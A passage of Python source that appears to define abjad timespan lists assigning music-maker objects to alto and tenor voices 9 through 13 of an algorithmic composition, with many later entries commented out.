# [(136, 8), (138, 8), alto_four_musicmaker_three],
# [(138, 8), (140, 8), alto_four_musicmaker_three],
# [(140, 8), (142, 8), alto_four_musicmaker_three],
# [(142, 8), (144, 8), alto_four_musicmaker_two],
# [(144, 8), (146, 8), alto_four_musicmaker_three],
# [(146, 8), (148, 8), alto_four_musicmaker_three],
# [(148, 8), (150, 8), alto_four_musicmaker_two],
# [(150, 8), (152, 8), alto_four_musicmaker_two],
#
# [(152, 8), (154, 8), alto_four_musicmaker_two],
# [(154, 8), (156, 8), alto_four_musicmaker_two],
# [(156, 8), (158, 8), alto_four_musicmaker_two],
# [(158, 8), (160, 8), alto_four_musicmaker_three],
#
# [(160, 8), (162, 8), alto_four_musicmaker_three],
# [(162, 8), (164, 8), alto_four_musicmaker_two],
# [(164, 8), (166, 8), alto_four_musicmaker_three],
# [(166, 8), (168, 8), alto_four_musicmaker_two],
#
# [(168, 8), (170, 8), alto_four_musicmaker_two],
# [(170, 8), (172, 8), alto_four_musicmaker_two],
# [(172, 8), (174, 8), alto_four_musicmaker_three],
# [(174, 8), (176, 8), alto_four_musicmaker_three],
#
# [(176, 8), (178, 8), alto_four_musicmaker_two],
# [(178, 8), (180, 8), alto_four_musicmaker_three],
# [(180, 8), (182, 8), alto_four_musicmaker_three],
# [(182, 8), (184, 8), alto_four_musicmaker_two],
#
# [(184, 8), (186, 8), alto_four_musicmaker_two],
# [(186, 8), (188, 8), alto_four_musicmaker_two],
# [(188, 8), (190, 8), alto_four_musicmaker_three],
# [(190, 8), (192, 8), alto_four_musicmaker_two],
#
# [(192, 8), (194, 8), alto_four_musicmaker_three],
# [(194, 8), (196, 8), alto_four_musicmaker_three],
# [(196, 8), (198, 8), alto_four_musicmaker_three],
# [(198, 8), (199, 8), alto_four_musicmaker_two],
]
])
voice_9_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 9',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_five_musicmaker_two],
[(2, 8), (4, 8), alto_five_musicmaker_three],
[(4, 8), (6, 8), alto_five_musicmaker_three],
[(6, 8), (8, 8), alto_five_musicmaker_two],
[(8, 8), (10, 8), alto_five_musicmaker_two],
[(10, 8), (12, 8), alto_five_musicmaker_two],
[(12, 8), (14, 8), alto_five_musicmaker_three],
[(14, 8), (16, 8), alto_five_musicmaker_two],
[(16, 8), (18, 8), alto_five_musicmaker_three],
[(18, 8), (20, 8), alto_five_musicmaker_three],
[(20, 8), (22, 8), alto_five_musicmaker_two],
[(22, 8), (24, 8), alto_five_musicmaker_three],
[(24, 8), (26, 8), alto_five_musicmaker_two],
[(26, 8), (28, 8), alto_five_musicmaker_two],
[(28, 8), (30, 8), alto_five_musicmaker_three],
[(30, 8), (32, 8), alto_five_musicmaker_two],
[(32, 8), (34, 8), alto_five_musicmaker_three],
[(34, 8), (36, 8), alto_five_musicmaker_three],
[(36, 8), (38, 8), alto_five_musicmaker_two],
[(38, 8), (40, 8), alto_five_musicmaker_three],
[(40, 8), (42, 8), alto_five_musicmaker_three],
[(42, 8), (44, 8), alto_five_musicmaker_two],
[(44, 8), (46, 8), alto_five_musicmaker_three],
[(46, 8), (48, 8), alto_five_musicmaker_two],
[(48, 8), (50, 8), alto_five_musicmaker_two],
[(50, 8), (52, 8), alto_five_musicmaker_two],
[(52, 8), (54, 8), alto_five_musicmaker_three],
[(54, 8), (56, 8), alto_five_musicmaker_two],
[(56, 8), (58, 8), alto_five_musicmaker_three],
[(58, 8), (60, 8), alto_five_musicmaker_three],
[(60, 8), (62, 8), alto_five_musicmaker_three],
[(62, 8), (64, 8), alto_five_musicmaker_two],
[(64, 8), (66, 8), alto_five_musicmaker_two],
[(66, 8), (68, 8), alto_five_musicmaker_three],
[(68, 8), (70, 8), alto_five_musicmaker_three],
[(70, 8), (72, 8), alto_five_musicmaker_three],
[(72, 8), (74, 8), alto_five_musicmaker_two],
[(74, 8), (76, 8), alto_five_musicmaker_two],
[(76, 8), (78, 8), alto_five_musicmaker_three],
[(78, 8), (80, 8), alto_five_musicmaker_three],
[(80, 8), (82, 8), alto_five_musicmaker_two],
[(82, 8), (84, 8), alto_five_musicmaker_three],
[(84, 8), (86, 8), alto_five_musicmaker_two],
[(86, 8), (88, 8), alto_five_musicmaker_three],
[(88, 8), (90, 8), alto_five_musicmaker_two],
[(90, 8), (92, 8), alto_five_musicmaker_three],
[(92, 8), (94, 8), alto_five_musicmaker_two],
[(94, 8), (96, 8), alto_five_musicmaker_three],
[(96, 8), (98, 8), alto_five_musicmaker_three],
[(98, 8), (100, 8), alto_five_musicmaker_three],
[(100, 8), (102, 8), alto_five_musicmaker_two],
[(102, 8), (104, 8), alto_five_musicmaker_two],
# [(104, 8), (106, 8), alto_five_musicmaker_two],
# [(106, 8), (108, 8), alto_five_musicmaker_three],
# [(108, 8), (110, 8), alto_five_musicmaker_two],
# [(110, 8), (112, 8), alto_five_musicmaker_three],
#
# [(112, 8), (114, 8), alto_five_musicmaker_two],
# [(114, 8), (116, 8), alto_five_musicmaker_three],
# [(116, 8), (118, 8), alto_five_musicmaker_three],
# [(118, 8), (120, 8), alto_five_musicmaker_two],
#
# [(120, 8), (122, 8), alto_five_musicmaker_three],
# [(122, 8), (124, 8), alto_five_musicmaker_three],
# [(124, 8), (126, 8), alto_five_musicmaker_two],
# [(126, 8), (128, 8), alto_five_musicmaker_two],
#
# [(128, 8), (130, 8), alto_five_musicmaker_two],
# [(130, 8), (132, 8), alto_five_musicmaker_two],
# [(132, 8), (134, 8), alto_five_musicmaker_three],
# [(134, 8), (136, 8), alto_five_musicmaker_three],
# [(136, 8), (138, 8), alto_five_musicmaker_three],
# [(138, 8), (140, 8), alto_five_musicmaker_two],
# [(140, 8), (142, 8), alto_five_musicmaker_two],
# [(142, 8), (144, 8), alto_five_musicmaker_three],
# [(144, 8), (146, 8), alto_five_musicmaker_two],
# [(146, 8), (148, 8), alto_five_musicmaker_three],
# [(148, 8), (150, 8), alto_five_musicmaker_two],
# [(150, 8), (152, 8), alto_five_musicmaker_three],
#
# [(152, 8), (154, 8), alto_five_musicmaker_two],
# [(154, 8), (156, 8), alto_five_musicmaker_two],
# [(156, 8), (158, 8), alto_five_musicmaker_two],
# [(158, 8), (160, 8), alto_five_musicmaker_three],
#
# [(160, 8), (162, 8), alto_five_musicmaker_three],
# [(162, 8), (164, 8), alto_five_musicmaker_two],
# [(164, 8), (166, 8), alto_five_musicmaker_three],
# [(166, 8), (168, 8), alto_five_musicmaker_three],
#
# [(168, 8), (170, 8), alto_five_musicmaker_three],
# [(170, 8), (172, 8), alto_five_musicmaker_two],
# [(172, 8), (174, 8), alto_five_musicmaker_two],
# [(174, 8), (176, 8), alto_five_musicmaker_two],
#
# [(176, 8), (178, 8), alto_five_musicmaker_two],
# [(178, 8), (180, 8), alto_five_musicmaker_three],
# [(180, 8), (182, 8), alto_five_musicmaker_two],
# [(182, 8), (184, 8), alto_five_musicmaker_two],
#
# [(184, 8), (186, 8), alto_five_musicmaker_three],
# [(186, 8), (188, 8), alto_five_musicmaker_two],
# [(188, 8), (190, 8), alto_five_musicmaker_three],
# [(190, 8), (192, 8), alto_five_musicmaker_three],
#
# [(192, 8), (194, 8), alto_five_musicmaker_two],
# [(194, 8), (196, 8), alto_five_musicmaker_three],
# [(196, 8), (198, 8), alto_five_musicmaker_two],
# [(198, 8), (199, 8), alto_five_musicmaker_two],
]
])
voice_10_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 10',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), alto_six_musicmaker_three],
[(2, 8), (4, 8), alto_six_musicmaker_three],
[(4, 8), (6, 8), alto_six_musicmaker_two],
[(6, 8), (8, 8), alto_six_musicmaker_three],
[(8, 8), (10, 8), alto_six_musicmaker_two],
[(10, 8), (12, 8), alto_six_musicmaker_two],
[(12, 8), (14, 8), alto_six_musicmaker_three],
[(14, 8), (16, 8), alto_six_musicmaker_two],
[(16, 8), (18, 8), alto_six_musicmaker_three],
[(18, 8), (20, 8), alto_six_musicmaker_two],
[(20, 8), (22, 8), alto_six_musicmaker_three],
[(22, 8), (24, 8), alto_six_musicmaker_two],
[(24, 8), (26, 8), alto_six_musicmaker_three],
[(26, 8), (28, 8), alto_six_musicmaker_two],
[(28, 8), (30, 8), alto_six_musicmaker_three],
[(30, 8), (32, 8), alto_six_musicmaker_two],
[(32, 8), (34, 8), alto_six_musicmaker_two],
[(34, 8), (36, 8), alto_six_musicmaker_two],
[(36, 8), (38, 8), alto_six_musicmaker_three],
[(38, 8), (40, 8), alto_six_musicmaker_three],
[(40, 8), (42, 8), alto_six_musicmaker_three],
[(42, 8), (44, 8), alto_six_musicmaker_two],
[(44, 8), (46, 8), alto_six_musicmaker_three],
[(46, 8), (48, 8), alto_six_musicmaker_three],
[(48, 8), (50, 8), alto_six_musicmaker_three],
[(50, 8), (52, 8), alto_six_musicmaker_two],
[(52, 8), (54, 8), alto_six_musicmaker_two],
[(54, 8), (56, 8), alto_six_musicmaker_two],
[(56, 8), (58, 8), alto_six_musicmaker_two],
[(58, 8), (60, 8), alto_six_musicmaker_two],
[(60, 8), (62, 8), alto_six_musicmaker_three],
[(62, 8), (64, 8), alto_six_musicmaker_two],
[(64, 8), (66, 8), alto_six_musicmaker_two],
[(66, 8), (68, 8), alto_six_musicmaker_three],
[(68, 8), (70, 8), alto_six_musicmaker_two],
[(70, 8), (72, 8), alto_six_musicmaker_three],
[(72, 8), (74, 8), alto_six_musicmaker_three],
[(74, 8), (76, 8), alto_six_musicmaker_two],
[(76, 8), (78, 8), alto_six_musicmaker_three],
[(78, 8), (80, 8), alto_six_musicmaker_two],
[(80, 8), (82, 8), alto_six_musicmaker_two],
[(82, 8), (84, 8), alto_six_musicmaker_two],
[(84, 8), (86, 8), alto_six_musicmaker_three],
[(86, 8), (88, 8), alto_six_musicmaker_two],
[(88, 8), (90, 8), alto_six_musicmaker_three],
[(90, 8), (92, 8), alto_six_musicmaker_three],
[(92, 8), (94, 8), alto_six_musicmaker_two],
[(94, 8), (96, 8), alto_six_musicmaker_three],
[(96, 8), (98, 8), alto_six_musicmaker_two],
[(98, 8), (100, 8), alto_six_musicmaker_two],
[(100, 8), (102, 8), alto_six_musicmaker_two],
[(102, 8), (104, 8), alto_six_musicmaker_three],
# [(104, 8), (106, 8), alto_six_musicmaker_three],
# [(106, 8), (108, 8), alto_six_musicmaker_three],
# [(108, 8), (110, 8), alto_six_musicmaker_two],
# [(110, 8), (112, 8), alto_six_musicmaker_two],
#
# [(112, 8), (114, 8), alto_six_musicmaker_three],
# [(114, 8), (116, 8), alto_six_musicmaker_three],
# [(116, 8), (118, 8), alto_six_musicmaker_two],
# [(118, 8), (120, 8), alto_six_musicmaker_two],
#
# [(120, 8), (122, 8), alto_six_musicmaker_two],
# [(122, 8), (124, 8), alto_six_musicmaker_three],
# [(124, 8), (126, 8), alto_six_musicmaker_two],
# [(126, 8), (128, 8), alto_six_musicmaker_three],
#
# [(128, 8), (130, 8), alto_six_musicmaker_three],
# [(130, 8), (132, 8), alto_six_musicmaker_two],
# [(132, 8), (134, 8), alto_six_musicmaker_three],
# [(134, 8), (136, 8), alto_six_musicmaker_two],
# [(136, 8), (138, 8), alto_six_musicmaker_two],
# [(138, 8), (140, 8), alto_six_musicmaker_three],
# [(140, 8), (142, 8), alto_six_musicmaker_two],
# [(142, 8), (144, 8), alto_six_musicmaker_two],
#
# [(144, 8), (146, 8), alto_six_musicmaker_three],
# [(146, 8), (148, 8), alto_six_musicmaker_two],
# [(148, 8), (150, 8), alto_six_musicmaker_two],
# [(150, 8), (152, 8), alto_six_musicmaker_three],
#
# [(152, 8), (154, 8), alto_six_musicmaker_two],
# [(154, 8), (156, 8), alto_six_musicmaker_three],
# [(156, 8), (158, 8), alto_six_musicmaker_two],
# [(158, 8), (160, 8), alto_six_musicmaker_three],
#
# [(160, 8), (162, 8), alto_six_musicmaker_two],
# [(162, 8), (164, 8), alto_six_musicmaker_two],
# [(164, 8), (166, 8), alto_six_musicmaker_three],
# [(166, 8), (168, 8), alto_six_musicmaker_three],
#
# [(168, 8), (170, 8), alto_six_musicmaker_two],
# [(170, 8), (172, 8), alto_six_musicmaker_two],
# [(172, 8), (174, 8), alto_six_musicmaker_three],
# [(174, 8), (176, 8), alto_six_musicmaker_three],
#
# [(176, 8), (178, 8), alto_six_musicmaker_three],
# [(178, 8), (180, 8), alto_six_musicmaker_two],
# [(180, 8), (182, 8), alto_six_musicmaker_three],
# [(182, 8), (184, 8), alto_six_musicmaker_two],
#
# [(184, 8), (186, 8), alto_six_musicmaker_two],
# [(186, 8), (188, 8), alto_six_musicmaker_two],
# [(188, 8), (190, 8), alto_six_musicmaker_three],
# [(190, 8), (192, 8), alto_six_musicmaker_three],
#
# [(192, 8), (194, 8), alto_six_musicmaker_three],
# [(194, 8), (196, 8), alto_six_musicmaker_three],
# [(196, 8), (198, 8), alto_six_musicmaker_two],
# [(198, 8), (199, 8), alto_six_musicmaker_two],
]
])
voice_11_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 11',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), tenor_one_musicmaker_three],
[(2, 8), (4, 8), tenor_one_musicmaker_three],
[(4, 8), (6, 8), tenor_one_musicmaker_two],
[(6, 8), (8, 8), tenor_one_musicmaker_two],
[(8, 8), (10, 8), tenor_one_musicmaker_two],
[(10, 8), (12, 8), tenor_one_musicmaker_three],
[(12, 8), (14, 8), tenor_one_musicmaker_three],
[(14, 8), (16, 8), tenor_one_musicmaker_three],
[(16, 8), (18, 8), tenor_one_musicmaker_three],
[(18, 8), (20, 8), tenor_one_musicmaker_two],
[(20, 8), (22, 8), tenor_one_musicmaker_two],
[(22, 8), (24, 8), tenor_one_musicmaker_two],
[(24, 8), (26, 8), tenor_one_musicmaker_two],
[(26, 8), (28, 8), tenor_one_musicmaker_three],
[(28, 8), (30, 8), tenor_one_musicmaker_three],
[(30, 8), (32, 8), tenor_one_musicmaker_three],
[(32, 8), (34, 8), tenor_one_musicmaker_three],
[(34, 8), (36, 8), tenor_one_musicmaker_three],
[(36, 8), (38, 8), tenor_one_musicmaker_two],
[(38, 8), (40, 8), tenor_one_musicmaker_two],
[(40, 8), (42, 8), tenor_one_musicmaker_two],
[(42, 8), (44, 8), tenor_one_musicmaker_two],
[(44, 8), (46, 8), tenor_one_musicmaker_three],
[(46, 8), (48, 8), tenor_one_musicmaker_three],
[(48, 8), (50, 8), tenor_one_musicmaker_three],
[(50, 8), (52, 8), tenor_one_musicmaker_three],
[(52, 8), (54, 8), tenor_one_musicmaker_two],
[(54, 8), (56, 8), tenor_one_musicmaker_two],
[(56, 8), (58, 8), tenor_one_musicmaker_two],
[(58, 8), (60, 8), tenor_one_musicmaker_three],
[(60, 8), (62, 8), tenor_one_musicmaker_three],
[(62, 8), (64, 8), tenor_one_musicmaker_three],
[(64, 8), (66, 8), tenor_one_musicmaker_two],
[(66, 8), (68, 8), tenor_one_musicmaker_two],
[(68, 8), (70, 8), tenor_one_musicmaker_three],
[(70, 8), (72, 8), tenor_one_musicmaker_two],
[(72, 8), (74, 8), tenor_one_musicmaker_two],
[(74, 8), (76, 8), tenor_one_musicmaker_two],
[(76, 8), (78, 8), tenor_one_musicmaker_three],
[(78, 8), (80, 8), tenor_one_musicmaker_three],
[(80, 8), (82, 8), tenor_one_musicmaker_three],
[(82, 8), (84, 8), tenor_one_musicmaker_three],
[(84, 8), (86, 8), tenor_one_musicmaker_two],
[(86, 8), (88, 8), tenor_one_musicmaker_two],
[(88, 8), (90, 8), tenor_one_musicmaker_two],
[(90, 8), (92, 8), tenor_one_musicmaker_two],
[(92, 8), (94, 8), tenor_one_musicmaker_two],
[(94, 8), (96, 8), tenor_one_musicmaker_two],
[(96, 8), (98, 8), tenor_one_musicmaker_two],
[(98, 8), (100, 8), tenor_one_musicmaker_three],
[(100, 8), (102, 8), tenor_one_musicmaker_three],
[(102, 8), (104, 8), tenor_one_musicmaker_three],
# [(104, 8), (106, 8), tenor_one_musicmaker_three],
# [(106, 8), (108, 8), tenor_one_musicmaker_three],
# [(108, 8), (110, 8), tenor_one_musicmaker_three],
# [(110, 8), (112, 8), tenor_one_musicmaker_three],
# [(112, 8), (114, 8), tenor_one_musicmaker_two],
# [(114, 8), (116, 8), tenor_one_musicmaker_two],
# [(116, 8), (118, 8), tenor_one_musicmaker_two],
# [(118, 8), (120, 8), tenor_one_musicmaker_two],
# [(120, 8), (122, 8), tenor_one_musicmaker_two],
# [(122, 8), (124, 8), tenor_one_musicmaker_three],
# [(124, 8), (126, 8), tenor_one_musicmaker_three],
# [(126, 8), (128, 8), tenor_one_musicmaker_three],
# [(128, 8), (130, 8), tenor_one_musicmaker_three],
# [(130, 8), (132, 8), tenor_one_musicmaker_three],
# [(132, 8), (134, 8), tenor_one_musicmaker_three],
# [(134, 8), (136, 8), tenor_one_musicmaker_two],
# [(136, 8), (138, 8), tenor_one_musicmaker_two],
# [(138, 8), (140, 8), tenor_one_musicmaker_two],
# [(140, 8), (142, 8), tenor_one_musicmaker_two],
# [(142, 8), (144, 8), tenor_one_musicmaker_two],
# [(144, 8), (146, 8), tenor_one_musicmaker_two],
# [(146, 8), (148, 8), tenor_one_musicmaker_two],
# [(148, 8), (150, 8), tenor_one_musicmaker_three],
# [(150, 8), (152, 8), tenor_one_musicmaker_three],
# [(152, 8), (154, 8), tenor_one_musicmaker_three],
# [(154, 8), (156, 8), tenor_one_musicmaker_three],
# [(156, 8), (158, 8), tenor_one_musicmaker_two],
# [(158, 8), (160, 8), tenor_one_musicmaker_two],
# [(160, 8), (162, 8), tenor_one_musicmaker_two],
# [(162, 8), (164, 8), tenor_one_musicmaker_two],
# [(164, 8), (166, 8), tenor_one_musicmaker_three],
# [(166, 8), (168, 8), tenor_one_musicmaker_three],
# [(168, 8), (170, 8), tenor_one_musicmaker_three],
# [(170, 8), (172, 8), tenor_one_musicmaker_three],
# [(172, 8), (174, 8), tenor_one_musicmaker_three],
# [(174, 8), (176, 8), tenor_one_musicmaker_two],
# [(176, 8), (178, 8), tenor_one_musicmaker_two],
# [(178, 8), (180, 8), tenor_one_musicmaker_two],
# [(180, 8), (182, 8), tenor_one_musicmaker_two],
# [(182, 8), (184, 8), tenor_one_musicmaker_two],
# [(184, 8), (186, 8), tenor_one_musicmaker_two],
# [(186, 8), (188, 8), tenor_one_musicmaker_two],
# [(188, 8), (190, 8), tenor_one_musicmaker_three],
# [(190, 8), (192, 8), tenor_one_musicmaker_three],
# [(192, 8), (194, 8), tenor_one_musicmaker_three],
# [(194, 8), (196, 8), tenor_one_musicmaker_three],
# [(196, 8), (198, 8), tenor_one_musicmaker_three],
# [(198, 8), (199, 8), tenor_one_musicmaker_two],
]
])
voice_12_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 12',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), tenor_two_musicmaker_two],
[(2, 8), (4, 8), tenor_two_musicmaker_three],
[(4, 8), (6, 8), tenor_two_musicmaker_three],
[(6, 8), (8, 8), tenor_two_musicmaker_three],
[(8, 8), (10, 8), tenor_two_musicmaker_three],
[(10, 8), (12, 8), tenor_two_musicmaker_three],
[(12, 8), (14, 8), tenor_two_musicmaker_three],
[(14, 8), (16, 8), tenor_two_musicmaker_two],
[(16, 8), (18, 8), tenor_two_musicmaker_two],
[(18, 8), (20, 8), tenor_two_musicmaker_two],
[(20, 8), (22, 8), tenor_two_musicmaker_two],
[(22, 8), (24, 8), tenor_two_musicmaker_two],
[(24, 8), (26, 8), tenor_two_musicmaker_two],
[(26, 8), (28, 8), tenor_two_musicmaker_two],
[(28, 8), (30, 8), tenor_two_musicmaker_three],
[(30, 8), (32, 8), tenor_two_musicmaker_three],
[(32, 8), (34, 8), tenor_two_musicmaker_three],
[(34, 8), (36, 8), tenor_two_musicmaker_three],
[(36, 8), (38, 8), tenor_two_musicmaker_three],
[(38, 8), (40, 8), tenor_two_musicmaker_three],
[(40, 8), (42, 8), tenor_two_musicmaker_three],
[(42, 8), (44, 8), tenor_two_musicmaker_two],
[(44, 8), (46, 8), tenor_two_musicmaker_two],
[(46, 8), (48, 8), tenor_two_musicmaker_two],
[(48, 8), (50, 8), tenor_two_musicmaker_three],
[(50, 8), (52, 8), tenor_two_musicmaker_three],
[(52, 8), (54, 8), tenor_two_musicmaker_two],
[(54, 8), (56, 8), tenor_two_musicmaker_two],
[(56, 8), (58, 8), tenor_two_musicmaker_two],
[(58, 8), (60, 8), tenor_two_musicmaker_two],
[(60, 8), (62, 8), tenor_two_musicmaker_two],
[(62, 8), (64, 8), tenor_two_musicmaker_three],
[(64, 8), (66, 8), tenor_two_musicmaker_three],
[(66, 8), (68, 8), tenor_two_musicmaker_three],
[(68, 8), (70, 8), tenor_two_musicmaker_three],
[(70, 8), (72, 8), tenor_two_musicmaker_three],
[(72, 8), (74, 8), tenor_two_musicmaker_two],
[(74, 8), (76, 8), tenor_two_musicmaker_two],
[(76, 8), (78, 8), tenor_two_musicmaker_two],
[(78, 8), (80, 8), tenor_two_musicmaker_two],
[(80, 8), (82, 8), tenor_two_musicmaker_two],
[(82, 8), (84, 8), tenor_two_musicmaker_two],
[(84, 8), (86, 8), tenor_two_musicmaker_two],
[(86, 8), (88, 8), tenor_two_musicmaker_three],
[(88, 8), (90, 8), tenor_two_musicmaker_three],
[(90, 8), (92, 8), tenor_two_musicmaker_three],
[(92, 8), (94, 8), tenor_two_musicmaker_three],
[(94, 8), (96, 8), tenor_two_musicmaker_three],
[(96, 8), (98, 8), tenor_two_musicmaker_three],
[(98, 8), (100, 8), tenor_two_musicmaker_two],
[(100, 8), (102, 8), tenor_two_musicmaker_two],
[(102, 8), (104, 8), tenor_two_musicmaker_two],
# [(104, 8), (106, 8), tenor_two_musicmaker_two],
# [(106, 8), (108, 8), tenor_two_musicmaker_three],
# [(108, 8), (110, 8), tenor_two_musicmaker_three],
# [(110, 8), (112, 8), tenor_two_musicmaker_three],
# [(112, 8), (114, 8), tenor_two_musicmaker_three],
# [(114, 8), (116, 8), tenor_two_musicmaker_two],
# [(116, 8), (118, 8), tenor_two_musicmaker_two],
# [(118, 8), (120, 8), tenor_two_musicmaker_two],
# [(120, 8), (122, 8), tenor_two_musicmaker_three],
# [(122, 8), (124, 8), tenor_two_musicmaker_three],
# [(124, 8), (126, 8), tenor_two_musicmaker_three],
# [(126, 8), (128, 8), tenor_two_musicmaker_three],
# [(128, 8), (130, 8), tenor_two_musicmaker_two],
# [(130, 8), (132, 8), tenor_two_musicmaker_two],
# [(132, 8), (134, 8), tenor_two_musicmaker_two],
# [(134, 8), (136, 8), tenor_two_musicmaker_two],
# [(136, 8), (138, 8), tenor_two_musicmaker_two],
# [(138, 8), (140, 8), tenor_two_musicmaker_two],
# [(140, 8), (142, 8), tenor_two_musicmaker_two],
# [(142, 8), (144, 8), tenor_two_musicmaker_three],
# [(144, 8), (146, 8), tenor_two_musicmaker_three],
# [(146, 8), (148, 8), tenor_two_musicmaker_three],
# [(148, 8), (150, 8), tenor_two_musicmaker_three],
# [(150, 8), (152, 8), tenor_two_musicmaker_three],
# [(152, 8), (154, 8), tenor_two_musicmaker_three],
# [(154, 8), (156, 8), tenor_two_musicmaker_two],
# [(156, 8), (158, 8), tenor_two_musicmaker_two],
# [(158, 8), (160, 8), tenor_two_musicmaker_two],
# [(160, 8), (162, 8), tenor_two_musicmaker_two],
# [(162, 8), (164, 8), tenor_two_musicmaker_three],
# [(164, 8), (166, 8), tenor_two_musicmaker_three],
# [(166, 8), (168, 8), tenor_two_musicmaker_two],
# [(168, 8), (170, 8), tenor_two_musicmaker_three],
# [(170, 8), (172, 8), tenor_two_musicmaker_three],
# [(172, 8), (174, 8), tenor_two_musicmaker_three],
# [(174, 8), (176, 8), tenor_two_musicmaker_two],
# [(176, 8), (178, 8), tenor_two_musicmaker_two],
# [(178, 8), (180, 8), tenor_two_musicmaker_two],
# [(180, 8), (182, 8), tenor_two_musicmaker_three],
# [(182, 8), (184, 8), tenor_two_musicmaker_three],
# [(184, 8), (186, 8), tenor_two_musicmaker_three],
# [(186, 8), (188, 8), tenor_two_musicmaker_two],
# [(188, 8), (190, 8), tenor_two_musicmaker_two],
# [(190, 8), (192, 8), tenor_two_musicmaker_two],
# [(192, 8), (194, 8), tenor_two_musicmaker_three],
# [(194, 8), (196, 8), tenor_two_musicmaker_three],
# [(196, 8), (198, 8), tenor_two_musicmaker_three],
# [(198, 8), (199, 8), tenor_two_musicmaker_three],
]
])
voice_13_timespan_list = abjad.TimespanList([
abjad.AnnotatedTimespan(
start_offset=start_offset,
stop_offset=stop_offset,
annotation=MusicSpecifier(
music_maker=music_maker,
voice_name='Voice 13',
),
)
for start_offset, stop_offset, music_maker in [
[(0, 8), (2, 8), tenor_three_musicmaker_three],
[(2, 8), (4, 8), tenor_three_musicmaker_three],
[(4, 8), (6, 8), tenor_three_musicmaker_three],
[(6, 8), (8, 8), tenor_three_musicmaker_three],
[(8, 8), (10, 8), tenor_three_musicmaker_three],
[(10, 8), (12, 8), tenor_three_musicmaker_three],
[(12, 8), (14, 8), tenor_three_musicmaker_two],
[(14, 8), (16, 8), tenor_three_musicmaker_two],
[(16, 8), (18, 8), tenor_three_musicmaker_two],
[(18, 8), (20, 8), tenor_three_musicmaker_two],
[(20, 8), (22, 8), tenor_three_musicmaker_two],
[(22, 8), (24, 8), tenor_three_musicmaker_two],
[(24, 8), (26, 8), tenor_three_musicmaker_three],
[(26, 8), (28, 8), tenor_three_musicmaker_three],
[(28, 8), (30, 8), tenor_three_musicmaker_three],
[(30, 8), (32, 8), tenor_three_musicmaker_two],
[(32, 8), (34, 8), tenor_three_musicmaker_two],
[(34, 8), (36, 8), tenor_three_musicmaker_two],
[(36, 8), (38, 8), tenor_three_musicmaker_two],
[(38, 8), (40, 8), tenor_three_musicmaker_three],
[(40, 8), (42, 8), tenor_three_musicmaker_three],
[(42, 8), (44, 8), tenor_three_musicmaker_three],
[(44, 8), (46, 8), tenor_three_musicmaker_three],
[(46, 8), (48, 8), tenor_three_musicmaker_three],
[(48, 8), (50, 8), tenor_three_musicmaker_three],
[(50, 8), (52, 8), tenor_three_musicmaker_three],
[(52, 8), (54, 8), tenor_three_musicmaker_two],
[(54, 8), (56, 8), tenor_three_musicmaker_two],
[(56, 8), (58, 8), tenor_three_musicmaker_two],
[(58, 8), (60, 8), tenor_three_musicmaker_two],
[(60, 8), (62, 8), tenor_three_musicmaker_two],
[(62, 8), (64, 8), tenor_three_musicmaker_three],
[(64, 8), (66, 8), tenor_three_musicmaker_three],
[(66, 8), (68, 8), tenor_three_musicmaker_three],
[(68, 8), (70, 8), tenor_three_musicmaker_three],
[(70, 8), (72, 8), tenor_three_musicmaker_three],
[(72, 8), (74, 8), tenor_three_musicmaker_two],
[(74, 8), (76, 8), tenor_three_musicmaker_two],
[(76, 8), (78, 8), tenor_three_musicmaker_two],
[(78, 8), (80, 8), tenor_three_musicmaker_two],
[(80, 8), (82, 8), tenor_three_musicmaker_two],
[(82, 8), (84, 8), tenor_three_musicmaker_two],
[(84, 8), (86, 8), tenor_three_musicmaker_two],
[(86, 8), (88, 8), tenor_three_musicmaker_three],
[(88, 8), (90, 8), tenor_three_musicmaker_three],
[(90, 8), (92, 8), tenor_three_musicmaker_three],
[(92, 8), (94, 8), tenor_three_musicmaker_three],
[(94, 8), (96, 8), tenor_three_musicmaker_two],
[(96, 8), (98, 8), tenor_three_musicmaker_two],
[(98, 8), (100, 8), tenor_three_musicmaker_two],
[(100, 8), (102, 8), tenor_three_musicmaker_two],
[(102, 8), (104, 8), tenor_three_musicmaker_two],
# [(104, 8), (106, 8), tenor_three_musicmaker_three],
# [(106, 8), (108, 8), tenor_three_musicmaker_three],
# [(108, 8), (110, 8), tenor_three_musicmaker_three],
# [(110, 8), (112, 8), tenor_three_musicmaker_three],
# [(112, 8), (114, 8), tenor_three_musicmaker_two],
# [(114, 8), (116, 8), tenor_three_musicmaker_two],
# [(116, 8), (118, 8), tenor_three_musicmaker_two],
# [(118, 8), (120, 8), tenor_three_musicmaker_two],
# [(120, 8), (122, 8), tenor_three_musicmaker_two],
# [(122, 8), (124, 8), tenor_three_musicmaker_two],
# [(124, 8), (126, 8), tenor_three_musicmaker_three],
# [(126, 8), (128, 8), tenor_three_musicmaker_three],
# [(128, 8), (130, 8), tenor_three_musicmaker_three],
# [(130, 8), (132, 8), tenor_three_musicmaker_three],
# [(132, 8), (134, 8), tenor_three_musicmaker_three],
# [(134, 8), (136, 8), tenor_three_musicmaker_three],
# [(136, 8), (138, 8), tenor_three_musicmaker_three],
# [(138, 8), (140, 8), tenor_three_musicmaker_two],
# [(140, 8), (142, 8), tenor_three_musicmaker_two],
# [(142, 8), (144, 8), tenor_three_musicmaker_two],
# [(144, 8), (146, 8), tenor_three_musicmaker_two],
# [(146, 8), (148, 8), tenor_three_musicmaker_three],
# [(148, 8), (150, 8), tenor_three_musicmaker_two],
# [(150, 8), (152, 8), tenor_three_musicmaker_two],
# [(152, 8), (154, 8), tenor_three_musicmaker_two],
# [(154, 8), (156, 8), tenor_three_musicmaker_three],
